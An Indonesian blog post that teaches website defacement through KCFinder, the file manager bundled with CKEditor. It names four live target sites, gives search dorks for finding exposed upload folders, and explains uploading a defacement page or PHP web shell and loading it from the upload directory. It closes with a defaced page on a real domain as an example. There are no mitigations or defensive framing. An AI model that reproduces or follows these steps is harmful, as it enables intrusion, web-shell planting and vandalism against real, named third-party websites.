OKE KALI INI ADMIN MAU SHARE MATERI DEFACE POC KCFINDER :D
TANPA LAMA LAMA LAGI LANSUNG KE TUTOR
BAHAN2
LIVE TARGET :D
https://trungdonghung.com.vn/ckeditor/kcfinder/
https://treehutvietnam.vn/ckeditor/kcfinder/
https://tacosun.vn/ckeditor/kcfinder/
https://vouchersharing.com/ckeditor/kcfinder/
DORK
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload/
/panel/kcfinder/upload/files /
editor/kcfinder/upload
Kcfinder/upload/file
EXPLOIT
kcfinder/browse.php?type=html
dan contoh web vuln
nah selanjutnya kalian klik upload
trus kalian pilih sc deface ke sayangan kalian
bisa juga shel php5
kalok web nya bisa up shel ya up shel ae kalaok gag vuln ya udah gag papa
dan cara manggilnya gimana ?
Site co.li/blablabla/kcfinder/upload/files/scriptkalian.html
Site co.li/blablabla/kcfinder/upload/files/shel.php5
dan misal sc kalian gag muncul di manager berati gag vuln kalok sc kalian muncul
di manager brati vuln :D
dan insaalah done ke hacked by :D
contoh
https://www.dmi.edu.bd/assets/ckeditor/kcfinder/upload/files/her.shtml
Tidak ada komentar:
Posting Komentar